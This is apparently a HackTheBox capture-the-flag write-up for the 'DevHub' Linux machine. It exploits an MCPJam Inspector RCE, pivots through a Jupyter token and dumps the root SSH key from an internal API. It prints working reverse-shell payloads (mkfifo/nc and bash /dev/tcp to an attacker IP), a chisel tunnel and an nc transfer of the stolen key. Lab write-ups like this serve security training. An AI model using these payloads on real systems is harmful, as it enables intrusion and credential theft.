← back to all writeups

DevHub

Linux Medium Pwned: 2026-05-31

Machine Info

FieldDetails
Machine NameDevHub
OSLinux
DifficultyMedium
StatusPwned

Tools Used


Summary

DevHub is a developer-focused machine centred around real-world MCP tooling vulnerabilities, where initial access is gained via an unauthenticated RCE in MCPJam Inspector (CVE-2026-23744) on port 6274, followed by lateral movement through a Jupyter server with a hardcoded token.

Privilege escalation to root is achieved by abusing a writable internal Flask API (opsmcp) running as root, which exposes a hidden credential dump endpoint that leaks the root SSH private key.


Reconnaissance

Initial Scan (NMAP)

Initial scan reveals website running on port 80.

# Nmap 7.98 scan initiated Sat May 30 15:54:58 2026 as: /usr/lib/nmap/nmap --privileged -sC -sV -oN recon/scan.txt 10.129.46.149
Nmap scan report for 10.129.46.149
Host is up (0.23s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:78:2e:79:0d:87:13:05:2f:53:8e:e7:3c:55:b6:4c (ECDSA)
|_  256 dd:56:8e:bc:da:b8:38:3e:9a:cd:0b:74:ee:53:85:f8 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devhub.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 30 15:55:29 2026 -- 1 IP address (1 host up) scanned in 31.34 seconds

Further enumeration on site reveals MCPJAM Inspector service running on port 6274 & an internal site running on port 8888.

Open Ports:

PortServiceVersionNotes
22ssh8.9p1
80http site running on nginx1.18.0
6274MCPJAm Inspector1.4.2
8888JupyterN/ADiscovered later while post exploitation.
5555Discovered later while performing PE.

Vulnerability Identification

MCPJam inspector is the local-first development platform for MCP servers. The Latest version Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.

CVEs / Vulnerabilities Identified

CVEDescriptionSeverity
CVE-2026-23744Unauthenticated RCE in MCPJam Inspector (CVSS 9.8)<br>Versions 1.4.2 and earlier of MCPJam Inspector are vulnerable to RCE. An attacker can send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. This vulnerability is more severe than CVE-2025-49596 — while that one requires tricking a user into clicking a malicious link, this one is exploitable with no user interaction.Critical

Initial Foothold / Initial Access

CVE-2026-23744

Description: To exploit the vulnerability, this proof of concept was used as a reference. We used the same command in linux format to trigger a reverse shell

Sending the following command while keeping the netcat listening for 4444 gives us initial foothold

curl -X POST http://devhub.htb:6274/api/mcp/connect \
  -H "Content-Type: application/json" \
  -d '{"serverConfig":{"command":"/bin/sh","args":["-c","rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.23 4444 >/tmp/f"],"env":{}},"serverId":"pwned"}'

Post-Exploitation

System Enumeration

At starting of the recon phase we discovered that the port 8888 are running locally on http://localhost:8888. To reverse the ports back to our client machine, we use chisel.

#On client machine
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz gunzip chisel_linux_amd64.gz

chmod +x chisel_linux_amd64

./chisel_linux_amd64 server -p 9000 --reverse
#On DevHub foothold

curl http://10.10.14.23:9000/chisel_linux_amd64 -o /tmp/chisel
chmod +x /tmp/chisel

# Forward port 8888 back to you
/tmp/chisel client 10.10.14.23:9000 R:8888:127.0.0.1:8888

Visiting the http://localhost:8888 from our local machine reverses us to the forwarded ports of the machine which is running a Jupyter server which requires a secret token for user authentication.

Credential Discovery

Further enumeration on initial foothold provides a token for the user analyst which gives us access to Jupyter.

find /etc/systemd -name "*.service" 2>/dev/null | xargs grep -l token grep:
...
"/etc/systemd/system/multi-user.target.wants/jupyter.service"

a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7

cat /etc/systemd/system/jupyter.service

---SNIP---
'a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7'
---SNIP---

Lateral Movement (Pivoting to user 'analyst')

Running the url authenticates us on the jupyter.

http://127.0.0.1:8888/?token=a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7

Creating a new terminal on Jupyter server and running a reverse shell command gives us a reverse shell for the user 'analyst'.

#In Jupyter Terminal
bash -i >& /dev/tcp/10.10.14.23/5555 0>&1

#In local machine
nc -lvnp 5555

User Flag

---CENSORED---

Privilege Escalation

Enumeration

Uploading linpeas and running scan reveals that we have root access to /opt/opsmcp/servers.py which is running an internal server on port 5000

Further investigation and after reading the servers.py code we discover that, there's a hidden ops._admin_dump endpoint that runs as root and can dump the root SSH keys. We can call it directly.

curl -s -X POST http://127.0.0.1:5000/tools/call \
  -H "Content-Type: application/json" \
  -H "X-API-Key: opsmcp_secret_key_4f5a6b7c8d9e0f1a" \ #Secret key found inside the scripts.py code.
  -d '{"name": "ops._admin_dump", "arguments": {"target": "ssh_keys", "confirm": true}}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['root_private_key'])" > /tmp/root_key

Transferring the fetched SSH key back to our machine, we can login as root.

# On your kali first:
nc -lvnp 7777 > root_id_rsa

# On target:
nc 10.10.14.23 7777 < /tmp/root_key
chmod 600 root_id_rsa
ssh -i root_id_rsa root@devhub.htb

Root Flag

---CENSORED---

Trophy

https://labs.hackthebox.com/achievement/machine/1574945/903

Completed as part of HackTheBox practice in a legal, controlled environment.